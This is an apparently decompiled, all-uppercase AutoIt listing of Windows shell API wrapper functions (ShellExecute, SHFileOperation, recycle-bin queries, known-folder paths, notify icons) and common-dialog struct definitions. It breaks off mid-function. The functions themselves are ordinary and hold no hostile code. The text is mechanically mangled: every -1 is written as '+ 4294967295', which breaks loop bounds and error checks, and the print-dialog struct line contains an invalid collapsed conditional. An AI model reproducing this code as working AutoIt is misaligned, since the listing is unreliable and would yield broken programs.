($HWND , $PSUBCLASSPROC , $IDSUBCLASS , $PDATA = 0 ) LOCAL $ARET = DLLCALL ("comctl32.dll" , "bool" , "SetWindowSubclass" , "hwnd" , $HWND , "ptr" , $PSUBCLASSPROC , "uint_ptr" , $IDSUBCLASS , "dword_ptr" , $PDATA ) IF @ERROR THEN RETURN SETERROR (@ERROR , @EXTENDED , 0 ) RETURN $ARET [0 ] ENDFUNC FUNC _WINAPI_SHELLADDTORECENTDOCS ($SFILEPATH ) LOCAL $STYPEOFFILE = "wstr" IF STRINGSTRIPWS ($SFILEPATH , $STR_STRIPLEADING + $STR_STRIPTRAILING ) THEN $SFILEPATH = _WINAPI_PATHSEARCHANDQUALIFY ($SFILEPATH , 1 ) IF NOT $SFILEPATH THEN RETURN SETERROR (1 , 0 , 0 ) ENDIF ELSE $STYPEOFFILE = "ptr" $SFILEPATH = 0 ENDIF DLLCALL ("shell32.dll" , "none" , "SHAddToRecentDocs" , "uint" , 3 , $STYPEOFFILE , $SFILEPATH ) IF @ERROR THEN RETURN SETERROR (@ERROR , @EXTENDED , 0 ) RETURN 1 ENDFUNC FUNC _WINAPI_SHELLCHANGENOTIFY ($IEVENT , $IFLAGS , $IITEM1 = 0 , $IITEM2 = 0 ) LOCAL $STYPEOFITEM1 = "dword_ptr" , $STYPEOFITEM2 = "dword_ptr" IF ISSTRING ($IITEM1 ) THEN $STYPEOFITEM1 = "wstr" ENDIF IF ISSTRING ($IITEM2 ) THEN $STYPEOFITEM2 = "wstr" ENDIF DLLCALL ("shell32.dll" , "none" , "SHChangeNotify" , "long" , $IEVENT , "uint" , $IFLAGS , $STYPEOFITEM1 , $IITEM1 , $STYPEOFITEM2 , $IITEM2 ) IF @ERROR THEN RETURN SETERROR (@ERROR , @EXTENDED , 0 ) RETURN 1 ENDFUNC FUNC _WINAPI_SHELLCHANGENOTIFYDEREGISTER ($IID ) LOCAL $ARET = DLLCALL ("shell32.dll" , "bool" , "SHChangeNotifyDeregister" , "ulong" , $IID ) IF @ERROR THEN RETURN SETERROR (@ERROR , @EXTENDED , FALSE ) RETURN $ARET [0 ] ENDFUNC FUNC _WINAPI_SHELLCHANGENOTIFYREGISTER ($HWND , $IMSG , $IEVENTS , $ISOURCES , $APATHS , $BRECURSIVE = FALSE ) LOCAL $IPATH = $APATHS , $TAGSTRUCT = "" IF ISARRAY ($APATHS ) THEN IF UBOUND ($APATHS , $UBOUND_COLUMNS ) THEN RETURN SETERROR (1 , 0 , 0 ) ELSE DIM $APATHS [1 ] = [$IPATH ] ENDIF FOR $I = 0 TO UBOUND ($APATHS ) + 4294967295 IF NOT _WINAPI_PATHISDIRECTORY ($APATHS [$I ] ) THEN RETURN SETERROR (2 , 0 , 0 ) NEXT FOR $I = 0 TO UBOUND ($APATHS ) + 4294967295 $TAGSTRUCT &= "ptr;int;" NEXT LOCAL $TENTRY = DLLSTRUCTCREATE ($TAGSTRUCT ) FOR $I = 0 TO UBOUND ($APATHS ) + 4294967295 $APATHS [$I ] = _WINAPI_SHELLILCREATEFROMPATH (_WINAPI_PATHSEARCHANDQUALIFY ($APATHS [$I ] ) ) DLLSTRUCTSETDATA ($TENTRY , 2 * $I + 1 , $APATHS [$I ] ) DLLSTRUCTSETDATA ($TENTRY , 2 * $I + 2 , $BRECURSIVE ) NEXT LOCAL $IERROR = 0 LOCAL $ARET = DLLCALL ("shell32.dll" , "ulong" , "SHChangeNotifyRegister" , "hwnd" , $HWND , "int" , $ISOURCES , "long" , $IEVENTS , "uint" , $IMSG , "int" , UBOUND ($APATHS ) , "struct*" , $TENTRY ) IF @ERROR OR NOT $ARET [0 ] THEN $IERROR = @ERROR + 10 FOR $I = 0 TO UBOUND ($APATHS ) + 4294967295 _WINAPI_COTASKMEMFREE ($APATHS [$I ] ) NEXT RETURN SETERROR ($IERROR , 0 , $ARET [0 ] ) ENDFUNC FUNC _WINAPI_SHELLCREATEDIRECTORY ($SFILEPATH , $HPARENT = 0 , $TSECURITY = 0 ) LOCAL $ARET = DLLCALL ("shell32.dll" , "int" , "SHCreateDirectoryExW" , "hwnd" , $HPARENT , "wstr" , $SFILEPATH , "struct*" , $TSECURITY ) IF @ERROR THEN RETURN SETERROR (@ERROR , @EXTENDED , 0 ) IF $ARET [0 ] THEN RETURN SETERROR (10 , $ARET [0 ] , 0 ) RETURN 1 ENDFUNC FUNC _WINAPI_SHELLEMPTYRECYCLEBIN ($SROOT = "" , $IFLAGS = 0 , $HPARENT = 0 ) LOCAL $ARET = DLLCALL ("shell32.dll" , "long" , "SHEmptyRecycleBinW" , "hwnd" , $HPARENT , "wstr" , $SROOT , "dword" , $IFLAGS ) IF @ERROR THEN RETURN SETERROR (@ERROR , @EXTENDED , 0 ) IF $ARET [0 ] THEN RETURN SETERROR (10 , $ARET [0 ] , 0 ) RETURN 1 ENDFUNC FUNC _WINAPI_SHELLEXECUTE ($SFILEPATH , $SARGS = "" , $SDIR = "" , $SVERB = "" , $ISHOW = 1 , $HPARENT = 0 ) LOCAL $STYPEOFARGS = "wstr" , $STYPEOFDIR = "wstr" , $STYPEOFVERB = "wstr" IF NOT STRINGSTRIPWS ($SARGS , $STR_STRIPLEADING + $STR_STRIPTRAILING ) THEN $STYPEOFARGS = "ptr" $SARGS = 0 ENDIF IF NOT STRINGSTRIPWS ($SDIR , $STR_STRIPLEADING + $STR_STRIPTRAILING ) THEN $STYPEOFDIR = "ptr" $SDIR = 0 ENDIF IF NOT STRINGSTRIPWS ($SVERB , $STR_STRIPLEADING + $STR_STRIPTRAILING ) THEN $STYPEOFVERB = "ptr" $SVERB = 0 ENDIF LOCAL $ARET = DLLCALL ("shell32.dll" , "ULONG_PTR" , "ShellExecuteW" , "hwnd" , $HPARENT , $STYPEOFVERB , $SVERB , "wstr" , $SFILEPATH , $STYPEOFARGS , $SARGS , $STYPEOFDIR , $SDIR , "int" , $ISHOW ) IF @ERROR THEN RETURN SETERROR (@ERROR , @EXTENDED , FALSE ) IF $ARET [0 ] <= 32 THEN RETURN SETERROR (10 , $ARET [0 ] , 0 ) RETURN $ARET [0 ] ENDFUNC FUNC _WINAPI_SHELLEXECUTEEX (BYREF $TSHEXINFO ) LOCAL $ARET = DLLCALL ("shell32.dll" , "bool" , "ShellExecuteExW" , "struct*" , $TSHEXINFO ) IF @ERROR THEN RETURN SETERROR (@ERROR , @EXTENDED , 0 ) RETURN $ARET [0 ] ENDFUNC FUNC _WINAPI_SHELLEXTRACTASSOCIATEDICON ($SFILEPATH , $BSMALL = FALSE ) LOCAL $IFLAGS = 256 IF NOT _WINAPI_PATHISDIRECTORY ($SFILEPATH ) THEN $IFLAGS = BITOR ($IFLAGS , 16 ) ENDIF IF $BSMALL THEN $IFLAGS = BITOR ($IFLAGS , 1 ) ENDIF LOCAL $TSHFILEINFO = DLLSTRUCTCREATE ($TAGSHFILEINFO ) IF NOT _WINAPI_SHELLGETFILEINFO ($SFILEPATH , $IFLAGS , 0 , $TSHFILEINFO ) THEN RETURN SETERROR (@ERROR + 10 , @EXTENDED , 0 ) RETURN DLLSTRUCTGETDATA ($TSHFILEINFO , "hIcon" ) ENDFUNC FUNC _WINAPI_SHELLEXTRACTICON ($SICON , $IINDEX , $IWIDTH , $IHEIGHT ) LOCAL $ARET = DLLCALL ("shell32.dll" , "int" , "SHExtractIconsW" , "wstr" , $SICON , "int" , $IINDEX , "int" , $IWIDTH , "int" , $IHEIGHT , "ptr*" , 0 , "ptr*" , 0 , "int" , 1 , "int" , 0 ) IF @ERROR OR NOT $ARET [0 ] OR NOT $ARET [5 ] THEN RETURN SETERROR (@ERROR , @EXTENDED , 0 ) RETURN $ARET [5 ] ENDFUNC FUNC _WINAPI_SHELLFILEOPERATION ($SFROM , $STO , $IFUNC , $IFLAGS , $STITLE = "" , $HPARENT = 0 ) LOCAL $IDATA IF NOT ISARRAY ($SFROM ) THEN $IDATA = $SFROM DIM $SFROM [1 ] = [$IDATA ] ENDIF LOCAL $TFROM = _WINAPI_ARRAYTOSTRUCT ($SFROM ) IF @ERROR THEN RETURN SETERROR (@ERROR + 20 , @EXTENDED , 0 ) IF NOT ISARRAY ($STO ) THEN $IDATA = $STO DIM $STO [1 ] = [$IDATA ] ENDIF LOCAL $TTO = _WINAPI_ARRAYTOSTRUCT ($STO ) IF @ERROR THEN RETURN SETERROR (@ERROR + 30 , @EXTENDED , 0 ) LOCAL $TSHFILEOPSTRUCT = DLLSTRUCTCREATE ($TAGSHFILEOPSTRUCT ) DLLSTRUCTSETDATA ($TSHFILEOPSTRUCT , "hWnd" , $HPARENT ) DLLSTRUCTSETDATA ($TSHFILEOPSTRUCT , "Func" , $IFUNC ) DLLSTRUCTSETDATA ($TSHFILEOPSTRUCT , "From" , DLLSTRUCTGETPTR ($TFROM ) ) DLLSTRUCTSETDATA ($TSHFILEOPSTRUCT , "To" , DLLSTRUCTGETPTR ($TTO ) ) DLLSTRUCTSETDATA ($TSHFILEOPSTRUCT , "Flags" , $IFLAGS ) DLLSTRUCTSETDATA ($TSHFILEOPSTRUCT , "ProgressTitle" , $STITLE ) LOCAL $ARET = DLLCALL ("shell32.dll" , "int" , "SHFileOperationW" , "struct*" , $TSHFILEOPSTRUCT ) IF @ERROR THEN RETURN SETERROR (@ERROR , @EXTENDED , 0 ) IF $ARET [0 ] THEN RETURN SETERROR (10 , $ARET [0 ] , 0 ) RETURN $TSHFILEOPSTRUCT ENDFUNC FUNC _WINAPI_SHELLFLUSHSFCACHE () DLLCALL ("shell32.dll" , "none" , "SHFlushSFCache" ) IF @ERROR THEN RETURN SETERROR (@ERROR , @EXTENDED , 0 ) RETURN 1 ENDFUNC FUNC _WINAPI_SHELLGETFILEINFO ($SFILEPATH , $IFLAGS , $IATTRIBUTES , BYREF $TSHFILEINFO ) LOCAL $ARET = DLLCALL ("shell32.dll" , "dword_ptr" , "SHGetFileInfoW" , "wstr" , $SFILEPATH , "dword" , $IATTRIBUTES , "struct*" , $TSHFILEINFO , "uint" , DLLSTRUCTGETSIZE ($TSHFILEINFO ) , "uint" , $IFLAGS ) IF @ERROR THEN RETURN SETERROR (@ERROR , @EXTENDED , 0 ) RETURN $ARET [0 ] ENDFUNC FUNC _WINAPI_SHELLGETICONOVERLAYINDEX ($SICON , $IINDEX ) LOCAL $STYPEOFICON = "wstr" IF NOT STRINGSTRIPWS ($SICON , $STR_STRIPLEADING + $STR_STRIPTRAILING ) THEN $STYPEOFICON = "ptr" $SICON = 0 ENDIF LOCAL $ARET = DLLCALL ("shell32.dll" , "int" , "SHGetIconOverlayIndexW" , $STYPEOFICON , $SICON , "int" , $IINDEX ) IF @ERROR OR ($ARET [0 ] = + 4294967295 ) THEN RETURN SETERROR (@ERROR , @EXTENDED , + 4294967295 ) RETURN $ARET [0 ] ENDFUNC FUNC _WINAPI_SHELLGETKNOWNFOLDERIDLIST ($SGUID , $IFLAGS = 0 , $HTOKEN = 0 ) LOCAL $TGUID = DLLSTRUCTCREATE ($TAGGUID ) LOCAL $ARET = DLLCALL ("ole32.dll" , "uint" , "CLSIDFromString" , "wstr" , $SGUID , "struct*" , $TGUID ) IF @ERROR OR $ARET [0 ] THEN RETURN SETERROR (@ERROR + 20 , @EXTENDED , 0 ) $ARET = DLLCALL ("shell32.dll" , "uint" , "SHGetKnownFolderIDList" , "struct*" , $TGUID , "dword" , $IFLAGS , "handle" , $HTOKEN , "ptr*" , 0 ) IF @ERROR THEN RETURN SETERROR (@ERROR , @EXTENDED , 0 ) IF $ARET [0 ] THEN RETURN SETERROR (10 , $ARET [0 ] , 0 ) RETURN $ARET [4 ] ENDFUNC FUNC _WINAPI_SHELLGETKNOWNFOLDERPATH ($SGUID , $IFLAGS = 0 , $HTOKEN = 0 ) LOCAL $TGUID = DLLSTRUCTCREATE ($TAGGUID ) LOCAL $ARET = DLLCALL ("ole32.dll" , "long" , "CLSIDFromString" , "wstr" , $SGUID , "struct*" , $TGUID ) IF @ERROR OR $ARET [0 ] THEN RETURN SETERROR (@ERROR + 20 , @EXTENDED , "" ) $ARET = DLLCALL ("shell32.dll" , "long" , "SHGetKnownFolderPath" , "struct*" , $TGUID , "dword" , $IFLAGS , "handle" , $HTOKEN , "ptr*" , 0 ) IF @ERROR THEN RETURN SETERROR (@ERROR , @EXTENDED , "" ) IF $ARET [0 ] THEN RETURN SETERROR (10 , $ARET [0 ] , "" ) LOCAL $SPATH = _WINAPI_GETSTRING ($ARET [4 ] ) _WINAPI_COTASKMEMFREE ($ARET [4 ] ) RETURN $SPATH ENDFUNC FUNC _WINAPI_SHELLGETLOCALIZEDNAME ($SFILEPATH ) LOCAL $ARET = DLLCALL ("shell32.dll" , "long" , "SHGetLocalizedName" , "wstr" , $SFILEPATH , "wstr" , "" , "uint*" , 0 , "int*" , 0 ) IF @ERROR THEN RETURN SETERROR (@ERROR , @EXTENDED , 0 ) IF $ARET [0 ] THEN RETURN SETERROR (10 , $ARET [0 ] , 0 ) LOCAL $ARESULT [2 ] LOCAL $ARET1 = DLLCALL ("kernel32.dll" , "dword" , "ExpandEnvironmentStringsW" , "wstr" , $ARET [2 ] , "wstr" , "" , "dword" , 4096 ) $ARESULT [0 ] = $ARET1 [2 ] $ARESULT [1 ] = $ARET [4 ] RETURN $ARESULT ENDFUNC FUNC _WINAPI_SHELLGETPATHFROMIDLIST ($PPIDL ) LOCAL $ARET = DLLCALL ("shell32.dll" , "bool" , "SHGetPathFromIDListW" , "struct*" , $PPIDL , "wstr" , "" ) IF @ERROR OR NOT $ARET [0 ] THEN RETURN SETERROR (@ERROR , @EXTENDED , "" ) RETURN $ARET [2 ] ENDFUNC FUNC _WINAPI_SHELLGETSETFOLDERCUSTOMSETTINGS ($SFILEPATH , $IFLAG , BYREF $TSHFCS ) LOCAL $SPROC = "SHGetSetFolderCustomSettings" IF $__WINVER < 1536 THEN $SPROC &= "W" LOCAL $ARET = DLLCALL ("shell32.dll" , "long" , $SPROC , "struct*" , $TSHFCS , "wstr" , $SFILEPATH , "dword" , $IFLAG ) IF @ERROR THEN RETURN SETERROR (@ERROR , @EXTENDED , 0 ) IF $ARET [0 ] THEN RETURN SETERROR (10 , $ARET [0 ] , 0 ) RETURN 1 ENDFUNC FUNC _WINAPI_SHELLGETSETTINGS ($IFLAGS ) LOCAL $TSHELLSTATE = DLLSTRUCTCREATE ("uint[8]" ) DLLCALL ("shell32.dll" , "none" , "SHGetSetSettings" , "struct*" , $TSHELLSTATE , "dword" , $IFLAGS , "bool" , 0 ) IF @ERROR THEN RETURN SETERROR (@ERROR , @EXTENDED , 0 ) LOCAL $IVAL1 = DLLSTRUCTGETDATA ($TSHELLSTATE , 1 , 1 ) LOCAL $IVAL2 = DLLSTRUCTGETDATA ($TSHELLSTATE , 1 , 8 ) LOCAL $IRESULT = 0 LOCAL $AOPT [20 ] [2 ] = [[1 , 1 ] , [2 , 2 ] , [4 , 32768 ] , [8 , 32 ] , [16 , 8 ] , [32 , 128 ] , [64 , 512 ] , [128 , 1024 ] , [256 , 2048 ] , [1024 , 4096 ] , [2048 , 8192 ] , [4096 , 16384 ] , [8192 , 131072 ] , [32768 , 262144 ] , [65536 , 1048576 ] , [1 , 524288 ] , [2 , 2097152 ] , [8 , 8388608 ] , [16 , 16777216 ] , [32 , 33554432 ] ] FOR $I = 0 TO 14 IF BITAND ($IVAL1 , $AOPT [$I ] [0 ] ) THEN $IRESULT += $AOPT [$I ] [1 ] ENDIF NEXT FOR $I = 15 TO 19 IF BITAND ($IVAL2 , $AOPT [$I ] [0 ] ) THEN $IRESULT += $AOPT [$I ] [1 ] ENDIF NEXT RETURN $IRESULT ENDFUNC FUNC _WINAPI_SHELLGETSPECIALFOLDERLOCATION ($ICSIDL ) LOCAL $ARET = DLLCALL ("shell32.dll" , "long" , "SHGetSpecialFolderLocation" , "hwnd" , 0 , "int" , $ICSIDL , "ptr*" , 0 ) IF @ERROR THEN RETURN SETERROR (@ERROR , @EXTENDED , 0 ) IF $ARET [0 ] THEN RETURN SETERROR (10 , $ARET [0 ] , 0 ) RETURN $ARET [3 ] ENDFUNC FUNC _WINAPI_SHELLGETSPECIALFOLDERPATH ($ICSIDL , $BCREATE = FALSE ) LOCAL $ARET = DLLCALL ("shell32.dll" , "bool" , "SHGetSpecialFolderPathW" , "hwnd" , 0 , "wstr" , "" , "int" , $ICSIDL , "bool" , $BCREATE ) IF @ERROR OR NOT $ARET [0 ] THEN RETURN SETERROR (@ERROR + 10 , @EXTENDED , "" ) RETURN $ARET [2 ] ENDFUNC FUNC _WINAPI_SHELLGETSTOCKICONINFO ($ISIID , $IFLAGS ) LOCAL $TSHSTOCKICONINFO = DLLSTRUCTCREATE ($TAGSHSTOCKICONINFO ) DLLSTRUCTSETDATA ($TSHSTOCKICONINFO , "Size" , DLLSTRUCTGETSIZE ($TSHSTOCKICONINFO ) ) LOCAL $ARET = DLLCALL ("shell32.dll" , "long" , "SHGetStockIconInfo" , "int" , $ISIID , "uint" , $IFLAGS , "struct*" , $TSHSTOCKICONINFO ) IF @ERROR THEN RETURN SETERROR (@ERROR , @EXTENDED , 0 ) IF $ARET [0 ] THEN RETURN SETERROR (10 , $ARET [0 ] , 0 ) RETURN $TSHSTOCKICONINFO ENDFUNC FUNC _WINAPI_SHELLILCREATEFROMPATH ($SFILEPATH ) LOCAL $ARET = DLLCALL ("shell32.dll" , "long" , "SHILCreateFromPath" , "wstr" , $SFILEPATH , "ptr*" , 0 , "dword*" , 0 ) IF @ERROR THEN RETURN SETERROR (@ERROR , @EXTENDED , 0 ) IF $ARET [0 ] THEN RETURN SETERROR (10 , $ARET [0 ] , 0 ) RETURN $ARET [2 ] ENDFUNC FUNC _WINAPI_SHELLNOTIFYICON ($IMESSAGE , BYREF $TNOTIFYICONDATA ) LOCAL $ARET = DLLCALL ("shell32.dll" , "bool" , "Shell_NotifyIconW" , "dword" , $IMESSAGE , "struct*" , $TNOTIFYICONDATA ) IF @ERROR THEN RETURN SETERROR (@ERROR , @EXTENDED , FALSE ) RETURN $ARET [0 ] ENDFUNC FUNC _WINAPI_SHELLNOTIFYICONGETRECT ($HWND , $IID , $TGUID = 0 ) LOCAL $TNII = DLLSTRUCTCREATE ("dword;hwnd;uint;" & $TAGGUID ) DLLSTRUCTSETDATA ($TNII , 1 , DLLSTRUCTGETSIZE ($TNII ) ) DLLSTRUCTSETDATA ($TNII , 2 , $HWND ) DLLSTRUCTSETDATA ($TNII , 3 , $IID ) IF ISDLLSTRUCT ($TGUID ) THEN IF NOT _WINAPI_MOVEMEMORY (DLLSTRUCTGETPTR ($TNII , 4 ) , $TGUID , 16 ) THEN RETURN SETERROR (@ERROR + 10 , @EXTENDED , 0 ) ENDIF LOCAL $TRECT = DLLSTRUCTCREATE ($TAGRECT ) LOCAL $ARET = DLLCALL ("shell32.dll" , "long" , "Shell_NotifyIconGetRect" , "struct*" , $TNII , "struct*" , $TRECT ) IF @ERROR THEN RETURN SETERROR (@ERROR , @EXTENDED , 0 ) IF $ARET [0 ] THEN RETURN SETERROR (10 , $ARET [0 ] , 0 ) RETURN $TRECT ENDFUNC FUNC _WINAPI_SHELLOBJECTPROPERTIES ($SFILEPATH , $ITYPE = 2 , $SPROPERTY = "" , $HPARENT = 0 ) LOCAL $STYPEOFPROPERTY = "wstr" IF NOT STRINGSTRIPWS ($SPROPERTY , $STR_STRIPLEADING + $STR_STRIPTRAILING ) THEN $STYPEOFPROPERTY = "ptr" $SPROPERTY = 0 ENDIF LOCAL $ARET = DLLCALL ("shell32.dll" , "bool" , "SHObjectProperties" , "hwnd" , $HPARENT , "dword" , $ITYPE , "wstr" , $SFILEPATH , $STYPEOFPROPERTY , $SPROPERTY ) IF @ERROR THEN RETURN SETERROR (@ERROR , @EXTENDED , FALSE ) RETURN $ARET [0 ] ENDFUNC FUNC _WINAPI_SHELLOPENFOLDERANDSELECTITEMS ($SFILEPATH , $ANAMES = 0 , $ISTART = 0 , $IEND = + 4294967295 , $IFLAGS = 0 ) LOCAL $PPIDL , $ARET , $TPTR = 0 , $ICOUNT = 0 , $IOBJ = 0 , $IERROR = 0 $SFILEPATH = _WINAPI_PATHREMOVEBACKSLASH (_WINAPI_PATHSEARCHANDQUALIFY ($SFILEPATH ) ) IF ISARRAY ($ANAMES ) THEN IF $SFILEPATH AND NOT _WINAPI_PATHISDIRECTORY ($SFILEPATH ) THEN RETURN SETERROR (@ERROR + 20 , @EXTENDED , 0 ) ENDIF $PPIDL = _WINAPI_SHELLILCREATEFROMPATH ($SFILEPATH ) IF @ERROR THEN RETURN SETERROR (@ERROR + 30 , @EXTENDED , 0 ) IF NOT __CHECKERRORARRAYBOUNDS ($ANAMES , $ISTART , $IEND ) THEN $TPTR = DLLSTRUCTCREATE ("ptr[" & ($IEND - $ISTART + 1 ) & "]" ) FOR $I = $ISTART TO $IEND $ICOUNT += 1 IF $ANAMES [$I ] THEN DLLSTRUCTSETDATA ($TPTR , 1 , _WINAPI_SHELLILCREATEFROMPATH ($SFILEPATH & "\" & $ANAMES [$I ] ) , $ICOUNT ) ELSE DLLSTRUCTSETDATA ($TPTR , 1 , 0 , $ICOUNT ) ENDIF NEXT ENDIF IF _WINAPI_COINITIALIZE () THEN $IOBJ = 1 $ARET = DLLCALL ("shell32.dll" , "long" , "SHOpenFolderAndSelectItems" , "ptr" , $PPIDL , "uint" , $ICOUNT , "struct*" , $TPTR , "dword" , $IFLAGS ) IF @ERROR THEN $IERROR = @ERROR + 10 ELSE IF $ARET [0 ] THEN $IERROR = 10 ENDIF IF $IOBJ THEN _WINAPI_COUNINITIALIZE () _WINAPI_COTASKMEMFREE ($PPIDL ) FOR $I = 1 TO $ICOUNT $PPIDL = DLLSTRUCTGETDATA ($TPTR , $I ) IF $PPIDL THEN _WINAPI_COTASKMEMFREE ($PPIDL ) ENDIF NEXT IF $IERROR = 10 THEN RETURN SETERROR (10 , $ARET [0 ] , 0 ) IF $IERROR THEN RETURN SETERROR ($IERROR , 0 , 0 ) RETURN 1 ENDFUNC FUNC _WINAPI_SHELLQUERYRECYCLEBIN ($SROOT = "" ) LOCAL $TSHQRBI = DLLSTRUCTCREATE ("align 4;dword_ptr;int64;int64" ) DLLSTRUCTSETDATA ($TSHQRBI , 1 , DLLSTRUCTGETSIZE ($TSHQRBI ) ) LOCAL $ARET = DLLCALL ("shell32.dll" , "long" , "SHQueryRecycleBinW" , "wstr" , $SROOT , "struct*" , $TSHQRBI ) IF @ERROR THEN RETURN SETERROR (@ERROR , @EXTENDED , 0 ) IF $ARET [0 ] THEN RETURN SETERROR (10 , $ARET [0 ] , 0 ) LOCAL $ARESULT [2 ] $ARESULT [0 ] = DLLSTRUCTGETDATA ($TSHQRBI , 2 ) $ARESULT [1 ] = DLLSTRUCTGETDATA ($TSHQRBI , 3 ) RETURN $ARESULT ENDFUNC FUNC _WINAPI_SHELLQUERYUSERNOTIFICATIONSTATE () LOCAL $ARET = DLLCALL ("shell32.dll" , "long" , "SHQueryUserNotificationState" , "uint*" , 0 ) IF @ERROR THEN RETURN SETERROR (@ERROR , @EXTENDED , 0 ) IF $ARET [0 ] THEN RETURN SETERROR (10 , $ARET [0 ] , 0 ) RETURN $ARET [1 ] ENDFUNC FUNC _WINAPI_SHELLREMOVELOCALIZEDNAME ($SFILEPATH ) LOCAL $ARET = DLLCALL ("shell32.dll" , "long" , "SHRemoveLocalizedName" , "wstr" , $SFILEPATH ) IF @ERROR THEN RETURN SETERROR (@ERROR , @EXTENDED , 0 ) IF $ARET [0 ] THEN RETURN SETERROR (10 , $ARET [0 ] , 0 ) RETURN 1 ENDFUNC FUNC _WINAPI_SHELLRESTRICTED ($IRESTRICTION ) LOCAL $ARET = DLLCALL ("shell32.dll" , "dword" , "SHRestricted" , "uint" , $IRESTRICTION ) IF @ERROR THEN RETURN SETERROR (@ERROR , @EXTENDED , 0 ) RETURN $ARET [0 ] ENDFUNC FUNC _WINAPI_SHELLSETKNOWNFOLDERPATH ($SGUID , $SFILEPATH , $IFLAGS = 0 , $HTOKEN = 0 ) LOCAL $TGUID = DLLSTRUCTCREATE ($TAGGUID ) LOCAL $ARET = DLLCALL ("ole32.dll" , "long" , "CLSIDFromString" , "wstr" , $SGUID , "struct*" , $TGUID ) IF @ERROR OR $ARET [0 ] THEN RETURN SETERROR (@ERROR + 20 , @EXTENDED , 0 ) $ARET = DLLCALL ("shell32.dll" , "long" , "SHSetKnownFolderPath" , "struct*" , $TGUID , "dword" , $IFLAGS , "handle" , $HTOKEN , "wstr" , $SFILEPATH ) IF @ERROR THEN RETURN SETERROR (@ERROR , @EXTENDED , 0 ) IF $ARET [0 ] THEN RETURN SETERROR (10 , $ARET [0 ] , 0 ) RETURN 1 ENDFUNC FUNC _WINAPI_SHELLSETLOCALIZEDNAME ($SFILEPATH , $SMODULE , $IRESID ) LOCAL $ARET = DLLCALL ("shell32.dll" , "long" , "SHSetLocalizedName" , "wstr" , $SFILEPATH , "wstr" , $SMODULE , "int" , $IRESID ) IF @ERROR THEN RETURN SETERROR (@ERROR , @EXTENDED , 0 ) IF $ARET [0 ] THEN RETURN SETERROR (10 , $ARET [0 ] , 0 ) RETURN 1 ENDFUNC FUNC _WINAPI_SHELLSETSETTINGS ($IFLAGS , $BSET ) LOCAL $IVAL1 = 0 , $IVAL2 = 0 LOCAL $AOPT [20 ] [2 ] = [[1 , 1 ] , [2 , 2 ] , [4 , 32768 ] , [8 , 32 ] , [16 , 8 ] , [32 , 128 ] , [64 , 512 ] , [128 , 1024 ] , [256 , 2048 ] , [1024 , 4096 ] , [2048 , 8192 ] , [4096 , 16384 ] , [8192 , 131072 ] , [32768 , 262144 ] , [65536 , 1048576 ] , [1 , 524288 ] , [2 , 2097152 ] , [8 , 8388608 ] , [16 , 16777216 ] , [32 , 33554432 ] ] IF $BSET THEN FOR $I = 0 TO 14 IF BITAND ($IFLAGS , $AOPT [$I ] [1 ] ) THEN $IVAL1 += $AOPT [$I ] [0 ] ENDIF NEXT FOR $I = 15 TO 19 IF BITAND ($IFLAGS , $AOPT [$I ] [1 ] ) THEN $IVAL2 += $AOPT [$I ] [0 ] ENDIF NEXT ENDIF LOCAL $TSHELLSTATE = DLLSTRUCTCREATE ("uint[8]" ) DLLSTRUCTSETDATA ($TSHELLSTATE , 1 , $IVAL1 , 1 ) DLLSTRUCTSETDATA ($TSHELLSTATE , 1 , $IVAL2 , 8 ) DLLCALL ("shell32.dll" , "none" , "SHGetSetSettings" , "struct*" , $TSHELLSTATE , "dword" , $IFLAGS , "bool" , 1 ) IF @ERROR THEN RETURN SETERROR (@ERROR , @EXTENDED , 0 ) RETURN 1 ENDFUNC FUNC _WINAPI_SHELLUPDATEIMAGE ($SICON , $IINDEX , $IIMAGE , $IFLAGS = 0 ) DLLCALL ("shell32.dll" , "none" , "SHUpdateImageW" , "wstr" , $SICON , "int" , $IINDEX , "uint" , $IFLAGS , "int" , $IIMAGE ) IF @ERROR THEN RETURN SETERROR (@ERROR , @EXTENDED , 0 ) RETURN 1 ENDFUNC #EndRegion Public Functions #Region Global Variables and Constants GLOBAL $__G_PFRBUFFER = 0 , $__G_IFRBUFFERSIZE = 16385 GLOBAL CONST $TAGDEVNAMES = "ushort DriverOffset;ushort DeviceOffset;ushort OutputOffset;ushort Default" GLOBAL CONST $TAGFINDREPLACE = "dword Size;hwnd hOwner;ptr hInstance;dword Flags;ptr FindWhat;ptr ReplaceWith;ushort FindWhatLen;ushort ReplaceWithLen;lparam lParam;ptr Hook;ptr TemplateName" GLOBAL CONST $TAGMSGBOXPARAMS = "uint Size;hwnd hOwner;ptr hInstance;int_ptr Text;int_ptr Caption;dword Style;int_ptr Icon;dword_ptr ContextHelpId;ptr MsgBoxCallback;dword LanguageId" GLOBAL CONST $TAGPAGESETUPDLG = "dword Size;hwnd hOwner;ptr hDevMode;ptr hDevNames;dword Flags;long PaperWidth;long PaperHeight;long MarginMinLeft;long MarginMinTop;long MarginMinRight;long MarginMinBottom;long MarginLeft;long MarginTop;long MarginRight;long MarginBottom;ptr hInstance;lparam lParam;ptr PageSetupHook;ptr PagePaintHook;ptr PageSetupTemplateName;ptr hPageSetupTemplate" GLOBAL CONST $TAGPRINTDLG = (@AUTOITX64 "" "align 2;" ) & "dword Size;hwnd hOwner;handle hDevMode;handle hDevNames;handle hDC;dword Flags;word FromPage;word ToPage;word MinPage;word MaxPage;word Copies;handle hInstance;lparam lParam;ptr PrintHook;ptr SetupHook;ptr PrintTemplateName;ptr SetupTemplateName;handle hPrintTemplate;handle hSetupTemplate" GLOBAL CONST $TAGPRINTDLGEX = "dword Size;hwnd hOwner;handle hDevMode;handle hDevNames;handle hDC;dword Flags;dword Flags2;dword ExclusionFlags;dword NumPageRanges;dword MaxPageRanges;ptr PageRanges;dword MinPage;dword MaxPage;dword Copies;handle hInstance;ptr PrintTemplateName;lparam lParam;dword NumPropertyPages;ptr hPropertyPages;dword StartPage;dword ResultAction" GLOBAL CONST $TAGPRINTPAGERANGE = "dword FromPage;dword ToPage" #EndRegion Global Variables and Constants #Region Functions list #EndRegion Functions list #Region Public Functions FUNC _WINAPI_BROWSEFORFOLDERDLG ($SROOT = "" , $STEXT = "" , $IFLAGS = 0 , $PBROWSEPROC = 0 , $LPARAM = 0 , $HPARENT = 0 ) LOCAL CONST $TAGBROWSEINFO = "hwnd hwndOwner;ptr pidlRoot;ptr pszDisplayName; ptr lpszTitle;uint ulFlags;ptr lpfn;lparam lParam;int iImage" LOCAL $TBROWSEINFO = DLLSTRUCTCREATE ($TAGBROWSEINFO & ";wchar[" & (STRINGLEN ($STEXT ) + 1 ) & "];wchar[260]" ) LOCAL $PPIDL = 0 , $SRESULT = "" IF STRINGSTRIPWS ($SROOT , $STR_STRIPLEADING + $STR_STRIPTRAILING ) 